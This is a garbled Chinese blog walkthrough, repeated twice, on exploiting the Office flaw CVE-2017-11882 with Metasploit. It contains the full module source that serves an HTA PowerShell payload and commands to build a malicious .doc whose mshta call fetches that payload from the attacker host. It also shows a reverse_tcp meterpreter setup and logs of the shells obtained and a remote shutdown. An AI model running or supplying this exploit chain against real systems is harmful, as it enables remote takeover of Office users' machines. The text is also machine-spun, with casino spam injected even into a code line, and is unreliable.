早晨时候接受了推送的狐狸尾巴预警,在网上搜索相关音信来看许多大牛已经支付出生成doc文档的台本和msf的poc,本文记录CVE-2017-11882
漏洞在 Msf下的选拔。

正马时候接到了推送的漏洞预警,在网上寻找相关新闻看来众多大牛已经开发出生成doc文档的脚本和msf的poc,本文记录CVE-2017-11882
漏洞在 Msf下的接纳。

 

 

 

 

Office隐藏17年的尾巴CVE_2017_11882测试记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参照小说1:

参考小说2:

 

POC地址:

 

中间环节出现,msf连接数据库失利的动静,解决措施:

 

1.制作标准

 

 

此地搭建两台虚拟机举办测试!

 

测试机配置音讯:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

第一在kali下安装nginx,或者tomcat应该也是足以的,首先将扭转的doc文件放在/usr/share/nginx/html目录下,方便被口诛笔伐的机械获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c
“mshta ;; -o cev2.doc

#
将下载好的纰漏模块放在msf任意目录下

root@kali:/# mv cve_2017_11882.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的始末如下:

##

#
This module requires Metasploit:

#
Current source:

##

class
MetasploitModule  < Msf::Exploit::Remote

  Rank =
NormalRanking

  include
Msf::Exploit::Remote::HttpServer

  def
initialize(info  = {})

    super(update_info(info,

      ‘Name’
=> ‘Microsoft Office Payload Delivery’,

      ‘Description’
=> %q{

        This
module generates an command to place within

        a
word document, that when executed, will retrieve a HTA payload

        via
HTTP from an web server. Currently have not figured out how

        to
generate a doc.

      },

      ‘License’
=> MSF_LICENSE,

      ‘Arch’
=> ARCH_X86,

      ‘Platform’
=> ‘win’,

      ‘Targets’
=>

        [

          [‘Automatic’,
{} ],

        ],

      ‘DefaultTarget’
=> 0,

    ))

  end

  def
on_request_uri(cli, _request)

    print_status(“Delivering
payload”)

    p
= regenerate_payload(cli)

    data =
Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_澳门金沙国际,X86,

      ‘win’,

      p.encoded,

      ‘hta-psh’,

      {
:arch => ARCH_X86, :platform => ‘win ‘}

    )

    send_response(cli,
data, ‘Content-Type’ => ‘application/hta’)

【澳门金沙国际】Msf利用复现。  end

  def
primer

    url =
get_uri

    print_status(“Place
the following DDE in an MS document:”)

    print_line(“mshta.exe
\”#{url}\””)

  end

 

然后,那里在动用msfconsole之前,须要先打开数据库,例如 service postgresql start 

开辟数据库之后,进入msfconsole,然后对msf进行起头化,执行msf
init

之后search
cve_2017_11882寻觅漏洞模块,然后依照【参考文章2】进行计划,最后exploit 之后启动对 8080
端口的监听,至于为何是8080端口我也不太精通啊!

 

2.万事俱备,只欠南风

 

本条时候,只需求在 win7
上通过浏览器的到
cve2.doc文档,打开以后,kali中命令行立时显示已经赢得到了一连,

澳门金沙国际 1

澳门金沙国际 2

session命令得到回答,session -i 【id】建立连接

shell命令可以收获cmd,执行net user查看用户

澳门金沙国际 3

澳门金沙国际 4

 

3.试验效果

 

透过那一个漏洞,可以胡作非为的执行一些限令,例如关机,删除一些文本,收集一些系列消息依然那多少个实惠的

在桌面新建文件夹

澳门金沙国际 5

远程关机

澳门金沙国际 6

尽管取得到了命令行,可是通过net
user命令可以看到登录的用户级别是Guest,那就限制了一些内需权限较高的吩咐执行!

还要那里win7没有设置杀软,我不明白安装杀软之后word文档会不会被查杀呢?

 

 

Office隐藏17年的狐狸尾巴CVE_2017_11882测试记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参考小说1:

参考文章2:

 

POC地址:

 

中间环节出现,msf连接数据库战败的情状,解决办法:

 

1.创制标准

 

 

那边搭建两台虚拟机进行测试!

 

测试机配置音讯:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

率先在kali下安装nginx,或者tomcat应该也是能够的,首先将转移的doc文件放在/usr/share/nginx/html目录下,方便被攻击的机器获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c
“mshta ;; -o cev2.doc

#
将下载好的狐狸尾巴模块放在msf任意目录下

root@kali:/# mv cve_2017_11882.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的始末如下:

##

#
This module requires Metasploit:

#
Current source:

##

class
MetasploitModule  < Msf::Exploit::Remote

  Rank =
NormalRanking

  include
Msf::Exploit::Remote::HttpServer

  def
initialize(info  = {})

    super(update_info(info,

      ‘Name’
=> ‘Microsoft Office Payload Delivery’,

      ‘Description’
=> %q{

        This
module generates an command to place within

        a
word document, that when executed, will retrieve a HTA payload

        via
HTTP from an web server. Currently have not figured out how

        to
generate a doc.

      },

      ‘License’
=> MSF_LICENSE,

      ‘Arch’
=> ARCH_X86,

      ‘Platform’
=> ‘win’,

      ‘Targets’
=>

        [

          [‘Automatic’,
{} ],

        ],

      ‘DefaultTarget’
=> 0,

    ))

  end

  def
on_request_uri(cli, _request)

    print_status(“Delivering
payload”)

    p
= regenerate_payload(cli)

    data =
Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      ‘win’,

      p.encoded,

      ‘hta-psh’,

      {
:arch => ARCH_X86, :platform => ‘win ‘}

    )

    send_response(cli,
data, ‘Content-Type’ => ‘application/hta’)

  end

  def
primer

    url =
get_uri

    print_status(“Place
the following DDE in an MS document:”)

    print_line(“mshta.exe
\”#{url}\””)

  end

 

然后,这里在运用msfconsole之前,需求先打开数据库,例如 service postgresql start 

打开数据库之后,进入msfconsole,然后对msf举办初步化,执行msf
init

之后search
cve_2017_11882招来漏洞模块,然后根据【参考文章2】举行布署,最终exploit 之后启动对 8080
端口的监听,至于何以是8080端口我也不太明了啊!

 

2.万事俱备,只欠南风

 

本条时候,只需求在 win7
上通过浏览器的到
cve2.doc文档,打开将来,kali中命令行马上彰显已经获得到了连年,

澳门金沙国际 7

澳门金沙国际 8

session命令获得回答,session -i 【id】建立连接

shell命令能够得到cmd,执行net user查看用户

澳门金沙国际 9

澳门金沙国际 10

 

3.试验效果

 

由此那么些漏洞,能够横行霸道的执行一些下令,例如关机,删除一些文书,收集一些系统新闻或者非凡实惠的

在桌面新建文件夹

澳门金沙国际 11

远程关机

澳门金沙国际 12

虽说得到到了命令行,不过通过net
user命令可以见见登录的用户级别是Guest,那就限制了有些内需权限较高的下令执行!

再者那里win7没有安装杀软,我不知情安装杀软之后word文档会不会被查杀呢?

 

 

0x00 漏洞简介

二零一七年九月14日,微软发布了11月份的安全补丁更新,其中相比引人关怀的实在悄然修复了藏匿17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响当下风靡的享有Office版本。攻击者可以运用漏洞以当下登录的用户的身价实施任意命令。
由于漏洞影响面较广,漏洞揭发后,金睛安全钻探团体持续对漏洞有关攻击事件进展关爱。1月19日,监控到了已有漏洞POC在网上流传,随即飞速对有关样本进行了然析。如今该样本全世界仅微软杀毒可以检测。

  • 漏洞影响版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

0x00 漏洞简介

二〇一七年十月14日,微软发表了五月份的安全补丁更新,其中相比较引人关怀的实际上悄然修复了藏匿17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响当下盛行的具备Office版本。攻击者可以动用漏洞以当下登录的用户的身份实施任意命令。
由于漏洞影响面较广,漏洞揭发后,金睛安全研讨社团持续对漏洞有关攻击事件展开关爱。6月19日,监控到了已有尾巴POC在网上流传,随即快捷对相关样本进行了剖析。近年来该样本满世界仅微软杀毒可以检测。

  • 漏洞影响版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office2013、激活工具

  3. win7旗舰版ISO镜像

如上工具已经打包好,下载地址:

链接:  密码:xl91

澳门金沙国际 13

 

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office2013、激活工具

  3. win7旗舰版ISO镜像

如上工具已经打包好,下载地址:

链接:  密码:xl91

澳门金沙国际 14

 

0x02 利用进程

  1. 生成doc

    #安装启动nginx
    [root@ihoneysec ~]# yum -y install nginx
    [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本
    [root@ihoneysec ~]# git clone
    [root@ihoneysec ~]# cd CVE-2017-11882/
    [root@ihoneysec CVE-2017-11882]# ls
    Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测试doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o cve.doc
    [*] Done ! output file –> cve.doc
    [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “mshta ” -o cve2.doc
    [*] Done ! output file –> cve2.doc
    [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网站根目录
    [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
    404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

  

  1. 测试正常弹出calc.exe总计器

澳门金沙国际 15

 

  1. kali msf配置Poc:

    root@kali:~# cd /
    # 将下载好的纰漏模块放在msf任意目录下
    root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
    # 检查ip地址
    root@kali:/mnt/hgfs/kalishare# ifconfig
    eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf
    root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

        =[ metasploit v4.16.6-dev                          ]
    
    • — –=[ 1683 exploits – 964 auxiliary – 297 post ]
    • — –=[ 498 payloads – 40 encoders – 10 nops ]
    • — –=[ Free Metasploit Pro trial: ]
      # 搜索cve_2017_11882 漏洞模块
      msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块
      msf > use exploit/windows/smb/cve_2017_11882
      # 设置payload为反弹tcp
      msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      # 设置本机ip
      msf exploit(cve_2017_11882) > set lhost 172.16.253.76
      lhost => 172.16.253.76
      # 设置uri的门路,要与第一步生成doc时安顿一致
      msf exploit(cve_2017_11882) > set URIPATH abc
      URIPATH => abc
      # 检查当前配备
      msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882):
      Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
      SRVPORT 8080 yes The local port to listen on.
      SSL false no Negotiate SSL for incoming connections
      SSLCert no Path to a custom SSL certificate (default is randomly generated)
      URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp):
      Name Current Setting Required Description


      EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
      LHOST 172.16.253.76 yes The listen address
      LPORT 4444 yes The listen port

      # 启动利用后,msf会监听本机8080端口,如果win7机器打开doc触发访问172.16.253.76:8080/abc就会赢得反弹到4444端口的tcp会话
      msf exploit(cve_2017_11882) > exploit
      [] Exploit running as background job 0.
      # 初阶监听
      [
      ] Started reverse TCP handler on 172.16.253.76:4444
      msf exploit(cve_2017_11882) > [] Using URL:
      [
      ] Local IP:
      [] Server started.
      [
      ] Place the following DDE in an MS document:
      mshta.exe “”
      msf exploit(cve_2017_11882) > [] 172.16.253.4 cve_2017_11882 – Delivering payload
      [
      ] Sending stage (179267 bytes) to 172.16.253.4 #收到反弹tcp连接
      [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
      [
      ] 172.16.253.4 cve_2017_11882 – Delivering payload
      [] Sending stage (179267 bytes) to 172.16.253.4
      [
      ] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) > sessions
      # 查看已经确立的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PC\win7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)
      # 进入id为1的会话
      msf exploit(cve_2017_11882) > sessions -i 1
      [*] Starting interaction with 1…
      # 验证得到反弹连接是不是是win7机器ip
      meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection
      Hardware MAC : 00:0c:29:72:2e:7d
      MTU : 1500
      IPv4 Address : 172.16.253.4
      IPv4 Netmask : 255.255.0.0
      IPv6 Address : fe80::c15d:3813:94ec:d6c8
      IPv6 Netmask : ffff:ffff:ffff:ffff::

      ……
      # 进入命令模式meterpreter > shell
      Process 2924 created.
      Channel 1 created.
      Microsoft Windows [�汾 6.1.7601]
      ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
      # 查看当前系统用户、主机名
      C:\Windows\system32>net user
      net user

      \WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:\Windows\system32>

  

 

0x02 利用进度

  1. 生成doc

    #安装启动nginx
    [root@ihoneysec ~]# yum -y install nginx
    [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本
    [root@ihoneysec ~]# git clone
    [root@ihoneysec ~]# cd CVE-2017-11882/
    [root@ihoneysec CVE-2017-11882]# ls
    Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测试doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o cve.doc
    [*] Done ! output file –> cve.doc
    [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “mshta ” -o cve2.doc
    [*] Done ! output file –> cve2.doc
    [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网站根目录
    [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
    404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

  

  1. 测试正常弹出calc.exe计算器

澳门金沙国际 16

 

  1. kali msf配置Poc:

    root@kali:~# cd /
    # 将下载好的狐狸尾巴模块放在msf任意目录下
    root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
    # 检查ip地址
    root@kali:/mnt/hgfs/kalishare# ifconfig
    eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf
    root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

        =[ metasploit v4.16.6-dev                          ]
    
    • — –=[ 1683 exploits – 964 auxiliary – 297 post ]
    • — –=[ 498 payloads – 40 encoders – 10 nops ]
    • — –=[ Free Metasploit Pro trial: ]
      # 搜索cve_2017_11882 漏洞模块
      msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块
      msf > use exploit/windows/smb/cve_2017_11882
      # 设置payload为反弹tcp
      msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      # 设置本机ip
      msf exploit(cve_2017_11882) > set lhost 172.16.253.76
      lhost => 172.16.253.76
      # 设置uri的路子,要与第一步生成doc时安插一致
      msf exploit(cve_2017_11882) > set URIPATH abc
      URIPATH => abc
      # 检查当前布署msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882):
      Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
      SRVPORT 8080 yes The local port to listen on.
      SSL false no Negotiate SSL for incoming connections
      SSLCert no Path to a custom SSL certificate (default is randomly generated)
      URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp):
      Name Current Setting Required Description


      EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
      LHOST 172.16.253.76 yes The listen address
      LPORT 4444 yes The listen port

      # 启动利用后,msf会监听本机8080端口,假若win7机器打开doc触发访问172.16.253.76:8080/abc就会拿走反弹到4444端口的tcp会话
      msf exploit(cve_2017_11882) > exploit
      [] Exploit running as background job 0.
      # 发轫监听
      [
      ] Started reverse TCP handler on 172.16.253.76:4444
      msf exploit(cve_2017_11882) > [] Using URL:
      [
      ] Local IP:
      [] Server started.
      [
      ] Place the following DDE in an MS document:
      mshta.exe “”
      msf exploit(cve_2017_11882) > [] 172.16.253.4 cve_2017_11882 – Delivering payload
      [
      ] Sending stage (179267 bytes) to 172.16.253.4 #收到反弹tcp连接
      [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
      [
      ] 172.16.253.4 cve_2017_11882 – Delivering payload
      [] Sending stage (179267 bytes) to 172.16.253.4
      [
      ] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) > sessions
      # 查看已经建立的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PC\win7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)
      # 进入id为1的会话
      msf exploit(cve_2017_11882) > sessions -i 1
      [*] Starting interaction with 1…
      # 验证得到反弹连接是或不是是win7机器ip
      meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection
      Hardware MAC : 00:0c:29:72:2e:7d
      MTU : 1500
      IPv4 Address : 172.16.253.4
      IPv4 Netmask : 255.255.0.0
      IPv6 Address : fe80::c15d:3813:94ec:d6c8
      IPv6 Netmask : ffff:ffff:ffff:ffff::

      ……
      # 进入命令模式meterpreter > shell
      Process 2924 created.
      Channel 1 created.
      Microsoft Windows [�汾 6.1.7601]
      ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
      # 查看当前系统用户、主机名
      C:\Windows\system32>net user
      net user

      \WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:\Windows\system32>

  

 

相关文章